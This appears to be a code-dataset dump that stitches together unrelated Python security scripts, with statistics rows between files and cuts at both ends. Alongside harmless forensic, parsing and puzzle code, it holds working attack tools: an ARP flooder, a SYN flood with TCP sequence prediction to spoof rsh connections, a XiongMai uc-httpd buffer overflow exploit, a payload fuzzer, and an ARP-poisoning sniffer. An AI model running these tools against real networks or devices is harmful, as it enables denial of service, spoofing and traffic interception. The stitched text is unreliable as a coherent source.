office_metadata_plugin.write(office_metadata_output, excel=1)
else:
office_metadata_plugin.write(office_metadata_output)
# Run ID3 metadata parser
if len(self.id3_metadata) > 0:
id3_metadata_plugin = Framework.Plugin('id3_metadata', self.id3_metadata, self.log)
id3_metadata_output = os.path.join(self.output, 'metadata')
id3_metadata_plugin.run(plugins.id3.main)
if self.kwargs['excel'] is True:
id3_metadata_plugin.write(id3_metadata_output, excel=1)
else:
id3_metadata_plugin.write(id3_metadata_output)
# Run PST parser
if len(self.pst_files) > 0:
pst_plugin = Framework.Plugin('pst', self.pst_files, self.log)
pst_output = os.path.join(self.output, 'pst')
pst_plugin.run(plugins.pst_indexer.main)
if self.kwargs['excel'] is True:
pst_plugin.write(pst_output, recursion=1, excel=1)
else:
pst_plugin.write(pst_output, recursion=1)
class Plugin(object):
def __init__(self, plugin, files, log):
self.plugin = plugin
self.files = files
self.log = log
self.results = {'data': [], 'headers': None}
def run(self, function):
msg = 'Executing {} plugin'.format(self.plugin)
print colorama.Fore.RESET + '[+]', msg
self.log.info(msg)
for f in self.files:
try:
data, headers = function(f)
self.results['data'].append(data)
self.results['headers'] = headers
except TypeError:
self.log.error('Issue processing {}. Skipping...'.format(f))
continue
msg = 'Plugin {} completed at {}'.format(self.plugin, datetime.now().strftime('%m/%d/%Y %H:%M:%S'))
print colorama.Fore.GREEN + '[*]', msg
self.log.info(msg)
def write(self, output, **kwargs):
msg = 'Writing results of {} plugin'.format(self.plugin)
print colorama.Fore.RESET + '[+]', msg
self.log.info(msg)
if not os.path.exists(output):
os.makedirs(output)
if 'excel' in kwargs.keys():
Framework.Writer(writers.xlsx_writer.writer, output, self.plugin + '.xlsx', self.results['headers'],
self.results['data'], **kwargs)
else:
Framework.Writer(writers.csv_writer.writer, output, self.plugin + '.csv', self.results['headers'],
self.results['data'], **kwargs)
if self.plugin == 'exif_metadata':
Framework.Writer(writers.kml_writer.writer, output, '', self.plugin + '.kml', self.results['data'])
class Writer(object):
def __init__(self, writer, output, name, header, data, **kwargs):
self.writer = writer
self.output = os.path.join(output, name)
self.header = header
self.data = data
self.recursion = None
if 'recursion' in kwargs.keys():
self.recursion = kwargs['recursion']
self.run()
def run(self):
if self.recursion:
self.writer(self.output, self.header, self.data, recursion=self.recursion)
else:
self.writer(self.output, self.header, self.data)
if __name__ == '__main__':
parser = argparse.ArgumentParser(version=str(__version__), description=__description__,
epilog='Developed by ' + __author__ + ' on ' + __date__)
parser.add_argument('INPUT_DIR', help='Base directory to process.')
parser.add_argument('OUTPUT_DIR', help='Output directory.')
parser.add_argument('-x', help='Excel output (Default CSV)', action='store_true')
parser.add_argument('-l', help='File path and name of log file.')
args = parser.parse_args()
if os.path.isfile(args.INPUT_DIR) or os.path.isfile(args.OUTPUT_DIR):
msg = 'Input and Output arguments must be directories.'
print colorama.Fore.RED + '[-]', msg
sys.exit(1)
if args.l:
if not os.path.exists(args.l):
os.makedirs(args.l) # create log directory path
log_path = os.path.join(args.l, 'framework.log')
else:
log_path = 'framework.log'
framework = Framework(args.INPUT_DIR, args.OUTPUT_DIR, log_path, excel=args.x)
framework.run()
| 40.521186 | 116 | 0.56287 |
cybersecurity-penetration-testing | import pypff
__author__ = 'Preston Miller & Chapin Bryce'
__date__ = '20160401'
__version__ = 0.01
__description__ = 'This scripts handles processing and output of PST Email Containers'
def main(pst_file):
"""
The main function opens a PST and calls functions to parse and report data from the PST
:param pst_file: A string representing the path to the PST file to analyze
:return: Tuple of the message data list and the report header fields
"""
opst = pypff.open(pst_file)
root = opst.get_root_folder()
message_data = folder_traverse(root, [], **{'pst_name': pst_file, 'folder_name': 'root'})
header = ['pst_name', 'folder_name', 'creation_time', 'submit_time', 'delivery_time',
'sender', 'subject', 'attachment_count']
return message_data, header
def folder_traverse(base, message_data, pst_name, folder_name):
"""
The folderTraverse function walks through the base of the folder and scans for sub-folders and messages
:param base: Base folder to scan for new items within the folder.
:param message_data: A list of data for output
:param pst_name: A string representing the name of the pst file
:param folder_name: A string representing the name of the folder
:return: None
"""
for folder in base.sub_folders:
if folder.number_of_sub_folders:
message_data = folder_traverse(folder, message_data, pst_name, folder.name)
message_data = check_for_messages(folder, message_data, pst_name, folder.name)
return message_data
def check_for_messages(folder, message_data, pst_name, folder_name):
"""
The checkForMessages function reads folder messages if present and passes them to the report function
:param folder: pypff.Folder object
:param message_data: list to pass and extend with message info
:param pst_name: A string representing the name of the pst file
:param folder_name: A string representing the name of the folder
:return: Dictionary of results by folder
"""
for message in folder.sub_messages:
message_dict = process_message(message)
message_dict['pst_name'] = pst_name
message_dict['folder_name'] = folder_name
message_data.append(message_dict)
return message_data
def process_message(message):
"""
The processMessage function processes multi-field messages to simplify collection of information
:param message: The pypff.Message object
:return: A dictionary with message fields (values) and their data (keys)
"""
return {
"subject": message.subject,
"sender": message.sender_name,
"header": message.transport_headers,
"body": message.plain_text_body,
"creation_time": message.creation_time,
"submit_time": message.client_submit_time,
"delivery_time": message.delivery_time,
"attachment_count": message.number_of_attachments,
}
| 37.921053 | 107 | 0.683125 |
cybersecurity-penetration-testing | from burp import IBurpExtender
from burp import IContextMenuFactory
from javax.swing import JMenuItem
from java.util import List, ArrayList
from java.net import URL
import socket
import urllib
import json
import re
import base64
bing_api_key = "YOURKEYHERE"
class BurpExtender(IBurpExtender, IContextMenuFactory):
def registerExtenderCallbacks(self, callbacks):
self._callbacks = callbacks
self._helpers = callbacks.getHelpers()
self.context = None
# we set up our extension
callbacks.setExtensionName("BHP Bing")
callbacks.registerContextMenuFactory(self)
return
def createMenuItems(self, context_menu):
self.context = context_menu
menu_list = ArrayList()
menu_list.add(JMenuItem("Send to Bing", actionPerformed=self.bing_menu))
return menu_list
def bing_menu(self,event):
# grab the details of what the user clicked
http_traffic = self.context.getSelectedMessages()
print "%d requests highlighted" % len(http_traffic)
for traffic in http_traffic:
http_service = traffic.getHttpService()
host = http_service.getHost()
print "User selected host: %s" % host
self.bing_search(host)
return
def bing_search(self,host):
# check if we have an IP or hostname
is_ip = re.match("[0-9]+(?:\.[0-9]+){3}", host)
if is_ip:
ip_address = host
domain = False
else:
ip_address = socket.gethostbyname(host)
domain = True
bing_query_string = "'ip:%s'" % ip_address
self.bing_query(bing_query_string)
if domain:
bing_query_string = "'domain:%s'" % host
self.bing_query(bing_query_string)
def bing_query(self,bing_query_string):
print "Performing Bing search: %s" % bing_query_string
# encode our query
quoted_query = urllib.quote(bing_query_string)
http_request = "GET https://api.datamarket.azure.com/Bing/Search/Web?$format=json&$top=20&Query=%s HTTP/1.1\r\n" % quoted_query
http_request += "Host: api.datamarket.azure.com\r\n"
http_request += "Connection: close\r\n"
http_request += "Authorization: Basic %s\r\n" % base64.b64encode(":%s" % bing_api_key)
http_request += "User-Agent: Blackhat Python\r\n\r\n"
json_body = self._callbacks.makeHttpRequest("api.datamarket.azure.com",443,True,http_request).tostring()
json_body = json_body.split("\r\n\r\n",1)[1]
try:
r = json.loads(json_body)
if len(r["d"]["results"]):
for site in r["d"]["results"]:
print "*" * 100
print site['Title']
print site['Url']
print site['Description']
print "*" * 100
j_url = URL(site['Url'])
if not self._callbacks.isInScope(j_url):
print "Adding to Burp scope"
self._callbacks.includeInScope(j_url)
except:
print "No results from Bing"
pass
return
| 25.491228 | 136 | 0.620073 |
owtf | """
Plugin for manual/external CORS testing
"""
from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "CORS Plugin to assist manual testing"
def run(PluginInfo):
resource = get_resources("ExternalCORS")
Content = plugin_helper.resource_linklist("Online Resources", resource)
return Content
| 24.714286 | 75 | 0.766017 |
cybersecurity-penetration-testing | class Solution(object):
# def findShortestSubArray(self, nums):
# """
# :type nums: List[int]
# :rtype: int
# """
# res = len(nums)
# counter = collections.Counter()
# for num in nums:
# counter[num] += 1
# degree = max(counter.values())
# for key, kdegree in counter.most_common():
# if degree != kdegree:
# break
# res = min(res, self.smallestSubArray(nums, key, degree))
# return res
# def smallestSubArray(self, nums, key, degree):
# start = nums.index(key)
# pos = start + 1
# degree -= 1
# while pos < len(nums) and degree != 0:
# if nums[pos] == key:
# degree -= 1
# pos += 1
# return pos - start
def findShortestSubArray(self, nums):
left, right, count = {}, {}, {}
for i, x in enumerate(nums):
if x not in left: left[x] = i
right[x] = i
count[x] = count.get(x, 0) + 1
ans = len(nums)
degree = max(count.values())
for x in count:
if count[x] == degree:
ans = min(ans, right[x] - left[x] + 1)
return ans
| 28.809524 | 70 | 0.46283 |
cybersecurity-penetration-testing | import random
number1 = random.randint(1, 10)
number2 = random.randint(1, 10)
print('What is ' + str(number1) + ' + ' + str(number2) + '?')
answer = int(input('> '))
if answer == number1 + number2:
print('Correct!')
else:
print('Nope! The answer is ' + str(number1 + number2)) | 31 | 62 | 0.609756 |
Python-Penetration-Testing-for-Developers | from scapy.all import *
num = int(raw_input("Enter the number of packets "))
interface = raw_input("Enter the Interface ")
arp_pkt=ARP(pdst='192.168.1.255',hwdst="ff:ff:ff:ff:ff:ff")
eth_pkt = Ether(src=RandMAC(),dst="ff:ff:ff:ff:ff:ff")
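# Send the requested number of broadcast ARP packets with a randomised source MAC out of the chosen interface.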
try:
sendp(eth_pkt/arp_pkt,iface=interface,count =num, inter= .001)
except :
print "Destination Unreachable "
| 22.933333 | 63 | 0.692737 |
Python-Penetration-Testing-for-Developers | import shodan
import requests
SHODAN_API_KEY = "{Insert your Shodan API key}"
api = shodan.Shodan(SHODAN_API_KEY)
target = 'www.packtpub.com'
dnsResolve = 'https://api.shodan.io/dns/resolve?hostnames=' + target + '&key=' + SHODAN_API_KEY
try:
# First we need to resolve our targets domain to an IP
resolved = requests.get(dnsResolve)
hostIP = resolved.json()[target]
# Then we need to do a Shodan search on that IP
host = api.host(hostIP)
print "IP: %s" % host['ip_str']
print "Organization: %s" % host.get('org', 'n/a')
print "Operating System: %s" % host.get('os', 'n/a')
# Print all banners
for item in host['data']:
print "Port: %s" % item['port']
print "Banner: %s" % item['data']
# Print vuln information
for item in host['vulns']:
CVE = item.replace('!','')
print 'Vulns: %s' % item
exploits = api.exploits.search(CVE)
for item in exploits['matches']:
if item.get('cve')[0] == CVE:
print item.get('description')
except:
print 'An error occurred'
| 25.780488 | 95 | 0.592525 |
Python-for-Offensive-PenTest | import ctypes
if ctypes.windll.shell32.IsUserAnAdmin() == 0:
print '[-] We are NOT admin! '
else:
print '[+] We are admin :) '
| 14.888889 | 46 | 0.591549 |
cybersecurity-penetration-testing | import optparse
from scapy.all import *
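# Classic TCP sequence-prediction attack: SYN-flood the host being impersonated to keep it quiet, sample the target's sequence-number increments to predict the next one, then spoof a connection (ports 513/514) from the silenced host.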
def synFlood(src, tgt):
for sport in range(1024,65535):
IPlayer = IP(src=src, dst=tgt)
TCPlayer = TCP(sport=sport, dport=513)
pkt = IPlayer / TCPlayer
send(pkt)
def calTSN(tgt):
seqNum = 0
preNum = 0
diffSeq = 0
for x in range(1, 5):
if preNum != 0:
preNum = seqNum
pkt = IP(dst=tgt) / TCP()
ans = sr1(pkt, verbose=0)
seqNum = ans.getlayer(TCP).seq
diffSeq = seqNum - preNum
print '[+] TCP Seq Difference: ' + str(diffSeq)
return seqNum + diffSeq
def spoofConn(src, tgt, ack):
IPlayer = IP(src=src, dst=tgt)
TCPlayer = TCP(sport=513, dport=514)
synPkt = IPlayer / TCPlayer
send(synPkt)
IPlayer = IP(src=src, dst=tgt)
TCPlayer = TCP(sport=513, dport=514, ack=ack)
ackPkt = IPlayer / TCPlayer
send(ackPkt)
def main():
parser = optparse.OptionParser('usage %prog '+\
'-s <src for SYN Flood> -S <src for spoofed connection> '+\
'-t <target address>')
parser.add_option('-s', dest='synSpoof', type='string',\
help='specifc src for SYN Flood')
parser.add_option('-S', dest='srcSpoof', type='string',\
help='specify src for spoofed connection')
parser.add_option('-t', dest='tgt', type='string',\
help='specify target address')
(options, args) = parser.parse_args()
if options.synSpoof == None or options.srcSpoof == None \
or options.tgt == None:
print parser.usage
exit(0)
else:
synSpoof = options.synSpoof
srcSpoof = options.srcSpoof
tgt = options.tgt
print '[+] Starting SYN Flood to suppress remote server.'
synFlood(synSpoof, srcSpoof)
print '[+] Calculating correct TCP Sequence Number.'
seqNum = calTSN(tgt) + 1
print '[+] Spoofing Connection.'
spoofConn(srcSpoof, tgt, seqNum)
print '[+] Done.'
if __name__ == '__main__':
main()
| 26.013699 | 65 | 0.595637 |
PenetrationTestingScripts | """
Django settings for scandere project.
Generated by 'django-admin startproject' using Django 1.9.1.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '(y8wl*cko@#9t-1alnz8w_4dssksqd#we0q2w0xw&w3erqdz(q'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
LOGIN_REDIRECT_URL = '/'
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'nmaper.apps.NmaperConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'scandere.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [''],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'scandere.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'scandere.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'zh-hans'
TIME_ZONE = 'Asia/Shanghai'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
| 25.414634 | 91 | 0.692118 |
Hands-On-Penetration-Testing-with-Python | import socket
import sys
payload="A" * 85
print "\n###############################################"
print "XiongMai uc-httpd 1.0.0 Buffer Overflow Exploit"
if len(sys.argv) < 2:
print "\nUsage: " + sys.argv[0] + " <Host>\n"
sys.exit()
print "\nTarget: " + sys.argv[1]
print "Sending exploit..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1],80))
s.send('POST /Login.htm HTTP/1.1\r\n')
s.send('command=login&username=' + payload + '&password=PoC\r\n\r\n')
s.recv(1024)
s.close()
print "\nExploit complete!"
| 23.909091 | 69 | 0.605119 |
cybersecurity-penetration-testing | #!/usr/bin/env python
'''
Author: Chris Duffy
Date: May 2015
Name: banner_grabber.py
Purpose: A script that grabs the banner of exposed services.
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import socket
def main():
ports = [21,23,22]
ips = "192.168.195."
for octet in range(0,255):
for port in ports:
ip = ips + str(octet)
#print("[*] Testing port %s at IP %s") % (port, ip)
try:
socket.setdefaulttimeout(1)
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((ip,port))
output = s.recv(1024)
print("[+] The banner: %s for IP: %s at Port: %s") % (output,ip,port)
except:
print("[-] Failed to Connect to %s:%s") % (ip, port)
finally:
s.close()
if __name__ == "__main__":
main()
| 43.442308 | 89 | 0.696537 |
owtf | """
ACTIVE Plugin for Generic Unauthenticated Web App Fuzzing via w3af
This will perform a "low-hanging-fruit" pass on the web app for easy to find (tool-findable) vulns
"""
from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Active Vulnerability Scanning without credentials via w3af"
def run(PluginInfo):
resource = get_resources("W3AF_Unauth")
return plugin_helper.CommandDump("Test Command", "Output", resource, PluginInfo, [])
| 34.785714 | 98 | 0.772 |
cybersecurity-penetration-testing | import xlsxwriter
from datetime import datetime
school_data = [['Department', 'Students', 'Cumulative GPA', 'Final Date'],
['Computer Science', 235, 3.44, datetime(2015, 07, 23, 18, 00, 00)],
['Chemistry', 201, 3.26, datetime(2015, 07, 25, 9, 30, 00)],
['Forensics', 99, 3.8, datetime(2015, 07, 23, 9, 30, 00)],
['Astronomy', 115, 3.21, datetime(2015, 07, 19, 15, 30, 00)]]
def writeXLSX(data):
workbook = xlsxwriter.Workbook('MyWorkbook.xlsx')
main_sheet = workbook.add_worksheet('MySheet')
date_format = workbook.add_format({'num_format': 'mm/dd/yy hh:mm:ss AM/PM'})
for i, entry in enumerate(data):
if i == 0:
main_sheet.write(i, 0, entry[0])
main_sheet.write(i, 1, entry[1])
main_sheet.write(i, 2, entry[2])
main_sheet.write(i, 3, entry[3])
else:
main_sheet.write(i, 0, entry[0])
main_sheet.write_number(i, 1, entry[1])
main_sheet.write_number(i, 2, entry[2])
main_sheet.write_datetime(i, 3, entry[3], date_format)
workbook.close()
writeXLSX(school_data)
| 34.151515 | 83 | 0.566005 |
Python-Penetration-Testing-for-Developers | import requests
import sys
from bs4 import BeautifulSoup, SoupStrainer
url = "http://127.0.0.1/xss/medium/guestbook2.php"
url2 = "http://127.0.0.1/xss/medium/addguestbook2.php"
url3 = "http://127.0.0.1/xss/medium/viewguestbook2.php"
f = open("/home/cam/Downloads/fuzzdb-1.09/attack-payloads/all-attacks/interesting-metacharacters.txt")
o = open("results.txt", 'a')
d = {}
sets = []
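# For each metacharacter payload, fill every input field of the guestbook form (except the submit button), post it, and log the page that renders the stored entry.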
print "Fuzzing begins!"
initial = requests.get(url)
for payload in f.readlines():
for field in BeautifulSoup(initial.text, parse_only=SoupStrainer('input')):
if field.has_attr('name'):
if field['name'].lower() == "submit":
d[field['name']] = "submit"
else:
d[field['name']] = payload
sets.append(d)
req = requests.post(url2, data=d)
response = requests.get(url3)
o.write("Payload: "+ payload +"\r\n")
o.write(response.text+"\r\n")
d = {}
print "Fuzzing has ended" | 26.636364 | 103 | 0.655324 |
Python-Penetration-Testing-for-Developers | import requests
req = requests.get('http://google.com')
headers = ['Server', 'Date', 'Via', 'X-Powered-By']
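# Print common fingerprinting headers from the response, silently skipping any the server does not return.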
for header in headers:
try:
result = req.headers[header]
print '%s: %s' % (header, result)
except Exception, error:
pass | 22.272727 | 51 | 0.615686 |
cybersecurity-penetration-testing | import sys
import socket
import threading
# this is a pretty hex dumping function directly taken from
# http://code.activestate.com/recipes/142812-hex-dumper/
def hexdump(src, length=16):
result = []
digits = 4 if isinstance(src, unicode) else 2
for i in xrange(0, len(src), length):
s = src[i:i+length]
hexa = b' '.join(["%0*X" % (digits, ord(x)) for x in s])
text = b''.join([x if 0x20 <= ord(x) < 0x7F else b'.' for x in s])
result.append( b"%04X %-*s %s" % (i, length*(digits + 1), hexa, text) )
print b'\n'.join(result)
def receive_from(connection):
buffer = ""
# We set a 2 second time out depending on your
# target this may need to be adjusted
connection.settimeout(2)
try:
# keep reading into the buffer until there's no more data
# or we time out
while True:
data = connection.recv(4096)
if not data:
break
buffer += data
except:
pass
return buffer
# modify any requests destined for the remote host
def request_handler(buffer):
# perform packet modifications
return buffer
# modify any responses destined for the local host
def response_handler(buffer):
# perform packet modifications
return buffer
def proxy_handler(client_socket, remote_host, remote_port, receive_first):
# connect to the remote host
remote_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
remote_socket.connect((remote_host,remote_port))
# receive data from the remote end if necessary
if receive_first:
remote_buffer = receive_from(remote_socket)
hexdump(remote_buffer)
# send it to our response handler
remote_buffer = response_handler(remote_buffer)
# if we have data to send to our local client send it
if len(remote_buffer):
print "[<==] Sending %d bytes to localhost." % len(remote_buffer)
client_socket.send(remote_buffer)
# now let's loop and reading from local, send to remote, send to local
# rinse wash repeat
while True:
# read from local host
local_buffer = receive_from(client_socket)
if len(local_buffer):
print "[==>] Received %d bytes from localhost." % len(local_buffer)
hexdump(local_buffer)
# send it to our request handler
local_buffer = request_handler(local_buffer)
# send off the data to the remote host
remote_socket.send(local_buffer)
print "[==>] Sent to remote."
# receive back the response
remote_buffer = receive_from(remote_socket)
if len(remote_buffer):
print "[<==] Received %d bytes from remote." % len(remote_buffer)
hexdump(remote_buffer)
# send to our response handler
remote_buffer = response_handler(remote_buffer)
# send the response to the local socket
client_socket.send(remote_buffer)
print "[<==] Sent to localhost."
# if no more data on either side close the connections
if not len(local_buffer) or not len(remote_buffer):
client_socket.close()
remote_socket.close()
print "[*] No more data. Closing connections."
break
def server_loop(local_host,local_port,remote_host,remote_port,receive_first):
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
server.bind((local_host,local_port))
except:
print "[!!] Failed to listen on %s:%d" % (local_host,local_port)
print "[!!] Check for other listening sockets or correct permissions."
sys.exit(0)
print "[*] Listening on %s:%d" % (local_host,local_port)
server.listen(5)
while True:
client_socket, addr = server.accept()
# print out the local connection information
print "[==>] Received incoming connection from %s:%d" % (addr[0],addr[1])
# start a thread to talk to the remote host
proxy_thread = threading.Thread(target=proxy_handler,args=(client_socket,remote_host,remote_port,receive_first))
proxy_thread.start()
def main():
# no fancy command line parsing here
if len(sys.argv[1:]) != 5:
print "Usage: ./proxy.py [localhost] [localport] [remotehost] [remoteport] [receive_first]"
print "Example: ./proxy.py 127.0.0.1 9000 10.12.132.1 9000 True"
sys.exit(0)
# setup local listening parameters
local_host = sys.argv[1]
local_port = int(sys.argv[2])
# setup remote target
remote_host = sys.argv[3]
remote_port = int(sys.argv[4])
# this tells our proxy to connect and receive data
# before sending to the remote host
receive_first = sys.argv[5]
if "True" in receive_first:
receive_first = True
else:
receive_first = False
# now spin up our listening socket
server_loop(local_host,local_port,remote_host,remote_port,receive_first)
main()
| 29.178771 | 128 | 0.581004 |
Ethical-Hacking-Scripts | import socket, binascii, struct, os, sys, time, threading
from optparse import OptionParser
from scapy.all import *
class OptionParse:
def __init__(self):
self.arg_parse()
def logo(self):
print("""\033[0;31;40m
_____ _ _ _____ _ __ __ __ ___
/ ____| (_) | |/ ____| (_)/ _|/ _| /_ | / _ \
| (___ __ _ _ _ _ __| | (___ _ __ _| |_| |_ ___ _ __ __ _| || | | |
\___ \ / _` | | | | |/ _` |\___ \| '_ \| | _| _/ _ \ '__| \ \ / / || | | |
____) | (_| | |_| | | (_| |____) | | | | | | | || __/ | \ V /| || |_| |
|_____/ \__, |\__,_|_|\__,_|_____/|_| |_|_|_| |_| \___|_| \_/ |_(_)___/
| |
|_|
Packet-Sniffing Script by DrSquid""")
def usage(self):
self.logo()
print("""
[+] Option Parsing Help:
        [+] -t, --translate - Script translates any incoming traffic and displays it in the output.
[+] -r, --raw - Script displays raw network traffic in output.
[+] -l, --log - Script Logs Network Traffic headers.
[+] -i, --info - Shows this message.
[+] -p, --poison - ARP Poisons a specified IP.
[+] -a, --address - Only Display Traffic from the provided IP Address.
[+] Usage:
[+] python3 SquidSniffer.py -t -r
[+] python3 SquidSniffer.py -t -a <ipaddress> -p <ipaddress>
[+] python3 SquidSniffer.py -i
""")
def arg_parse(self):
args = OptionParser()
args.add_option("-t","--translate", action="store_true", dest="translate")
args.add_option("-r","--raw",action="store_true",dest="raw")
args.add_option("-i","--info",action="store_true",dest="info")
args.add_option("-l", "--log", action="store_true", dest="log")
args.add_option("-p", "--poison", dest="poisontarget")
args.add_option("-a", "--address", dest="address")
opt,arg = args.parse_args()
if opt.info is not None:
self.usage()
sys.exit()
else:
pass
if opt.poisontarget is not None:
poison = opt.poisontarget
else:
poison = None
if opt.address is not None:
address = opt.address
else:
address = None
if opt.translate is not None:
translate = True
else:
translate = False
if opt.log is not None:
log = True
else:
log = False
if opt.raw is not None:
raw = True
else:
raw = False
self.logo()
sniffer = PacketSniffer(translate, raw, log, poison, address)
print("[+] Preparing to recieve packets......\n")
time.sleep(5)
sniffing = threading.Thread(target=sniffer.sniffing)
sniffing.start()
class ARP_Poisoner:
def __init__(self, targ_ip, gate_ip):
self.targ_ip = targ_ip
self.gate_ip = gate_ip
def obtain_macaddress(self, ip):
arpbroadcast = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(op=1, pdst=ip)
recv = srp(arpbroadcast, timeout=2, verbose=False)
return recv[0][0][1].hwsrc
def send_arp_pkt(self, targetip, targetmac, sourceip):
packet = ARP(op=2, pdst=targetip, psrc=sourceip, hwdst=targetmac)
send(packet, verbose=False)
def restore_arp(self, targetip, targetmac, sourceip, sourcemac):
packet = ARP(op=2, hwsrc=sourcemac, psrc=sourceip, hwdst=targetmac, pdst=targetip)
send(packet, verbose=False)
print(f"[+] ARP Table Restored For: {targetip}")
def arp_poison(self):
try:
self.gate_mac = self.obtain_macaddress(self.gate_ip)
print(f"[+] Gateway MAC: {self.gate_mac}")
except:
print(f"[+] Unable to Obtain MAC Address for {self.gate_ip}")
sys.exit()
try:
self.targ_mac = self.obtain_macaddress(self.targ_ip)
print(f"[+] Target MAC: {self.targ_mac}")
except:
print(f"[+] Unable to Obtain MAC Address for {self.targ_ip}")
sys.exit()
print("\n[+] Sending ARP-Poisoning Packets to Targets\n[+] Do CTRL+C To Stop Arp Poisoning.\n")
while True:
try:
self.send_arp_pkt(self.targ_ip, self.targ_mac, self.gate_ip)
self.send_arp_pkt(self.gate_ip, self.gate_mac, self.targ_ip)
except:
self.restore_arp(self.gate_ip, self.gate_mac, self.targ_ip, self.targ_mac)
self.restore_arp(self.targ_ip, self.targ_mac, self.gate_ip, self.gate_mac)
break
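    # Stand-alone usage sketch (target and gateway addresses are placeholders):
    #   ARP_Poisoner("192.168.0.50", "192.168.0.1").arp_poison()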
class PacketSniffer:
def __init__(self, translate=False, raw=False, log=False, poison=None, address=None):
self.os = os.name
self.poison = poison
self.logger = bool(log)
self.translat = bool(translate)
self.address = address
self.raw = bool(raw)
self.hastarget = False
if self.address is not None:
try:
self.hastarget = True
self.targ_mac = ARP_Poisoner.obtain_macaddress(None, self.address)
print(f"[+] Obtained MAC Address of {self.address}: {self.targ_mac}")
except:
print(f"[+] Unable to Obtain MAC Address of {self.address}.")
print("[+] Check you arguements.")
sys.exit()
